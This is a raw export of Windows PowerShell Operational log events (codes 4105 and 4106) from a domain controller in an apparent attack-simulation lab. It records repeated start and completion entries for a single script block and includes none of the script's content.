Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476361
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476360
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476359
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476358
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476357
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476356
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476355
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476354
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476353
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476352
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476351
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476350
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476349
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476348
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476347
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476346
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476345
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476344
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476343
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476342
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476341
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476340
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476339
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476338
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476337
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476336
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476335
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476334
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476333
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476332
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476331
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476330
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476329
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476328
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476327
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476326
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476325
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476324
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476323
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476322
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476321
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476320
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476319
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476318
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476317
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476316
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476315
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476314
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476313
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476312
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476311
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476310
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476309
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
